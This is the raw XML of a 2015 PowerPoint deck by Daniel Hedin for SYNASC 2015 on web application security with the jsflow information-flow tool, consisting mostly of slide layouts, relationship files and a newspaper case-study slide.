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21" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId80"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId81"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="609" r:id="rId2"/>
    <p:sldId id="676" r:id="rId3"/>
    <p:sldId id="610" r:id="rId4"/>
    <p:sldId id="614" r:id="rId5"/>
    <p:sldId id="332" r:id="rId6"/>
    <p:sldId id="328" r:id="rId7"/>
    <p:sldId id="613" r:id="rId8"/>
    <p:sldId id="258" r:id="rId9"/>
    <p:sldId id="617" r:id="rId10"/>
    <p:sldId id="344" r:id="rId11"/>
    <p:sldId id="345" r:id="rId12"/>
    <p:sldId id="346" r:id="rId13"/>
    <p:sldId id="619" r:id="rId14"/>
    <p:sldId id="620" r:id="rId15"/>
    <p:sldId id="700" r:id="rId16"/>
    <p:sldId id="695" r:id="rId17"/>
    <p:sldId id="696" r:id="rId18"/>
    <p:sldId id="697" r:id="rId19"/>
    <p:sldId id="698" r:id="rId20"/>
    <p:sldId id="699" r:id="rId21"/>
    <p:sldId id="704" r:id="rId22"/>
    <p:sldId id="682" r:id="rId23"/>
    <p:sldId id="352" r:id="rId24"/>
    <p:sldId id="370" r:id="rId25"/>
    <p:sldId id="504" r:id="rId26"/>
    <p:sldId id="683" r:id="rId27"/>
    <p:sldId id="684" r:id="rId28"/>
    <p:sldId id="694" r:id="rId29"/>
    <p:sldId id="373" r:id="rId30"/>
    <p:sldId id="624" r:id="rId31"/>
    <p:sldId id="374" r:id="rId32"/>
    <p:sldId id="378" r:id="rId33"/>
    <p:sldId id="629" r:id="rId34"/>
    <p:sldId id="632" r:id="rId35"/>
    <p:sldId id="706" r:id="rId36"/>
    <p:sldId id="621" r:id="rId37"/>
    <p:sldId id="634" r:id="rId38"/>
    <p:sldId id="623" r:id="rId39"/>
    <p:sldId id="701" r:id="rId40"/>
    <p:sldId id="643" r:id="rId41"/>
    <p:sldId id="642" r:id="rId42"/>
    <p:sldId id="636" r:id="rId43"/>
    <p:sldId id="637" r:id="rId44"/>
    <p:sldId id="638" r:id="rId45"/>
    <p:sldId id="639" r:id="rId46"/>
    <p:sldId id="640" r:id="rId47"/>
    <p:sldId id="641" r:id="rId48"/>
    <p:sldId id="675" r:id="rId49"/>
    <p:sldId id="645" r:id="rId50"/>
    <p:sldId id="685" r:id="rId51"/>
    <p:sldId id="687" r:id="rId52"/>
    <p:sldId id="688" r:id="rId53"/>
    <p:sldId id="689" r:id="rId54"/>
    <p:sldId id="690" r:id="rId55"/>
    <p:sldId id="691" r:id="rId56"/>
    <p:sldId id="692" r:id="rId57"/>
    <p:sldId id="707" r:id="rId58"/>
    <p:sldId id="673" r:id="rId59"/>
    <p:sldId id="547" r:id="rId60"/>
    <p:sldId id="702" r:id="rId61"/>
    <p:sldId id="678" r:id="rId62"/>
    <p:sldId id="703" r:id="rId63"/>
    <p:sldId id="705" r:id="rId64"/>
    <p:sldId id="680" r:id="rId65"/>
    <p:sldId id="679" r:id="rId66"/>
    <p:sldId id="709" r:id="rId67"/>
    <p:sldId id="681" r:id="rId68"/>
    <p:sldId id="598" r:id="rId69"/>
    <p:sldId id="611" r:id="rId70"/>
    <p:sldId id="599" r:id="rId71"/>
    <p:sldId id="708" r:id="rId72"/>
    <p:sldId id="601" r:id="rId73"/>
    <p:sldId id="602" r:id="rId74"/>
    <p:sldId id="603" r:id="rId75"/>
    <p:sldId id="604" r:id="rId76"/>
    <p:sldId id="605" r:id="rId77"/>
    <p:sldId id="608" r:id="rId78"/>
    <p:sldId id="606" r:id="rId7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95" autoAdjust="0"/>
    <p:restoredTop sz="83061" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="45" d="100"/>
          <a:sy n="45" d="100"/>
        </p:scale>
        <p:origin x="-128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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/handoutMaster" Target="handoutMasters/handoutMaster1.xml"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="printerSettings/printerSettings1.bin"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.xml"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps.xml"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId86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8501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4B07F-376C-CA4F-B928-1E80EE425A7F}" type="datetimeFigureOut">
              <a:rPr lang="sv-SE" smtClean="0"/>
              <a:t>23/09/15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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868468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A87DF7-1DB4-7540-ABE1-0CBD3A5B64B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6778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4A18E3-00C0-EE4E-A948-085D9EA23DE9}" type="datetimeFigureOut">
              <a:rPr lang="sv-SE" smtClean="0"/>
              <a:t>23/09/15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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Klicka här för att ändra format på bakgrundstexten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Nivå två</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Nivå tre</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Nivå fyra</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Nivå fem</a:t>
            </a:r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C948B6-01A6-E14E-9D66-4AAEBD8B291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911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753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3326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021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49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67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672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6145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9884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503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9859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877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7852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8770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5476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6585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9884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3665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3591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2663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9884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8744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578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1026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496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0350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5547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9884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913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487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4158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633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7246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136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1026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3301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633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579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463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0854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4030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6899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513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4690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055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1026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5596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4614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2293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13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50070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5168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894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7631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5195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901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7718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9417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491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28585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12858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62019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45539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45539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2036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97493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092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66552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39257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6727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3775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62665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14688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81193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64808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21496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67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54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948B6-01A6-E14E-9D66-4AAEBD8B29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53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400" y="2052960"/>
            <a:ext cx="1981200" cy="1828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Klicka här för att ändra format på underrubrik i bakgrunden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8A432C8-69A7-458B-9684-2BFA64B31948}" type="datetime2">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>onsdag 23 september 15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D57B0AA-AC8E-4463-ADAC-E87D09B82E4F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹Nr.›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052960"/>
            <a:ext cx="6324600" cy="182880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onsdag 23 september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2400" y="147319"/>
            <a:ext cx="6705600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47319"/>
            <a:ext cx="1956046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274638"/>
            <a:ext cx="1676400" cy="5851525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert"/>
          <a:lstStyle/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onsdag 23 september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onsdag 23 september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62799" y="2892277"/>
            <a:ext cx="1600201" cy="1645920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933D019-A32C-4EAD-B8E6-DBDA699692FD}" type="datetime2">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>onsdag 23 september 15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892277"/>
            <a:ext cx="6324600" cy="164592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onsdag 23 september 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22438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399"/>
            <a:ext cx="4040188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399"/>
            <a:ext cx="4041775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onsdag 23 september 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onsdag 23 september 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150919"/>
            <a:ext cx="8831802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onsdag 23 september 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nehåll med bild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152400" y="152400"/>
            <a:ext cx="6705600" cy="655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04800"/>
            <a:ext cx="5867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59752" y="2130552"/>
            <a:ext cx="1673352" cy="2816352"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0"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onsdag 23 september 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D57B0AA-AC8E-4463-ADAC-E87D09B82E4F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹Nr.›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159752" y="457200"/>
            <a:ext cx="1675660" cy="1673352"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2000" spc="150" baseline="0"/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ed bild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" y="152400"/>
            <a:ext cx="6705600" cy="65532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 smtClean="0"/>
              <a:t>Dra bilden till platshållaren eller klicka på ikonen för att lägga till den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2800" y="2133600"/>
            <a:ext cx="1676400" cy="2971800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns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onsdag 23 september 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2800" y="460248"/>
            <a:ext cx="1676400" cy="1673352"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2000" spc="150" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr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1634971"/>
            <a:ext cx="8831802" cy="50454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399" y="152400"/>
            <a:ext cx="8814047" cy="13464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719071"/>
            <a:ext cx="8407893" cy="4407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A80CB818-7379-467D-8E76-EF9D9074A26C}" type="datetime2">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>onsdag 23 september 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2" r:id="rId1"/>
    <p:sldLayoutId id="2147484123" r:id="rId2"/>
    <p:sldLayoutId id="2147484124" r:id="rId3"/>
    <p:sldLayoutId id="2147484125" r:id="rId4"/>
    <p:sldLayoutId id="2147484126" r:id="rId5"/>
    <p:sldLayoutId id="2147484127" r:id="rId6"/>
    <p:sldLayoutId id="2147484128" r:id="rId7"/>
    <p:sldLayoutId id="2147484129" r:id="rId8"/>
    <p:sldLayoutId id="2147484130" r:id="rId9"/>
    <p:sldLayoutId id="2147484131" r:id="rId10"/>
    <p:sldLayoutId id="2147484132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 cap="all" spc="200" baseline="0">
          <a:ln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sz="2000" kern="1200" spc="150" baseline="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800" kern="1200" spc="100" baseline="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600" kern="1200" spc="100" baseline="0">
          <a:solidFill>
            <a:schemeClr val="tx2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buClr>
          <a:schemeClr val="accent4"/>
        </a:buClr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spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent6"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr sz="1300" kern="1200" spc="100" baseline="0">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6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5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jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.jp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1" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto12.wdp"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/><Relationship Id="rId13" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto6.wdp"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId15" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto11.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto9.wdp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.jp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gif"/><Relationship Id="rId10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11" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto12.wdp"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/><Relationship Id="rId13" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto6.wdp"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId15" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto13.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto9.wdp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.jp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gif"/><Relationship Id="rId10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png"/><Relationship Id="rId12" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto15.wdp"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId16" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto16.wdp"/><Relationship Id="rId17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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto9.wdp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.gif"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/><Relationship Id="rId9" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto14.wdp"/><Relationship Id="rId10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.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png"/><Relationship Id="rId13" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto15.wdp"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId18" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto16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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto9.wdp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.gif"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/><Relationship Id="rId10" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto14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.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png"/><Relationship Id="rId13" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto15.wdp"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId18" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto16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Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto9.wdp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.gif"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/><Relationship Id="rId10" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto14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5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1" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto2.wdp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png"/><Relationship Id="rId12" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto15.wdp"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId16" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto16.wdp"/><Relationship Id="rId17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Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto9.wdp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.gif"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/><Relationship Id="rId9" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto14.wdp"/><Relationship Id="rId10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11" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto16.wdp"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/><Relationship Id="rId13" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto6.wdp"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png"/><Relationship Id="rId15" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto15.wdp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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.png"/><Relationship Id="rId5" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto9.wdp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hyperlink" Target="file://localhost/view-source/http/::localhost/5000:login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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto3.wdp"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId7" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto4.wdp"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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1" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto6.wdp"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png"/><Relationship Id="rId13" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto15.wdp"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.png"/><Relationship Id="rId16" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto17.wdp"/><Relationship Id="rId17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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.png"/><Relationship Id="rId5" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto9.wdp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21.png"/><Relationship Id="rId9" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto16.wdp"/><Relationship Id="rId10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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto18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jpg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId13" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto7.wdp"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId15" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto8.wdp"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.png"/><Relationship Id="rId19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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId6" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto5.wdp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/><Relationship Id="rId8" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto6.wdp"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.jpg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto19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png"/><Relationship Id="rId12" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto15.wdp"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId14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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto9.wdp"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId7" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto3.wdp"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId9" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto4.wdp"/><Relationship Id="rId10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1" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto12.wdp"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/><Relationship Id="rId13" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto6.wdp"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId15" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto11.wdp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8.png"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto9.wdp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.jp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gif"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide7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png"/><Relationship Id="rId12" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto11.wdp"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png"/><Relationship Id="rId14" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto15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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.png"/><Relationship Id="rId5" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto9.wdp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76.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/><Relationship Id="rId10" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto6.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto9.wdp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/><Relationship Id="rId9" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto6.wdp"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId11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1" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto10.wdp"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/><Relationship Id="rId13" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto6.wdp"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId15" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto11.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto9.wdp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.jp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gif"/><Relationship Id="rId10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derrubrik 1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Daniel Hedin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SYNASC 2015</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>22 September 2015</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Based on joint work with Andrei </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Sabelfeld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> et al.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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application security using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>jsflow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592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Newspaper case study</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Bildobjekt 3" descr="Screen Shot 2015-08-05 at 10.12.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14" y="1523999"/>
            <a:ext cx="5606558" cy="5400000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Bildobjekt 4" descr="Screen Shot 2015-08-05 at 10.14.3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754" y="1524000"/>
            <a:ext cx="5606557" cy="5400000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Bildobjekt 5" descr="Screen Shot 2015-08-05 at 10.15.0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858" y="1524000"/>
            <a:ext cx="5606557" cy="5400000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Bildobjekt 6" descr="Screen Shot 2015-08-05 at 10.15.1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519" y="1524000"/>
            <a:ext cx="560655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318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ktangel med rundade hörn 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5897158" y="3697629"/>
            <a:ext cx="2759095" cy="7290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Bildobjekt 31" descr="url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50" b="35480"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4588893" y="2043349"/>
            <a:ext cx="1208224" cy="354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SvD</a:t>
            </a:r>
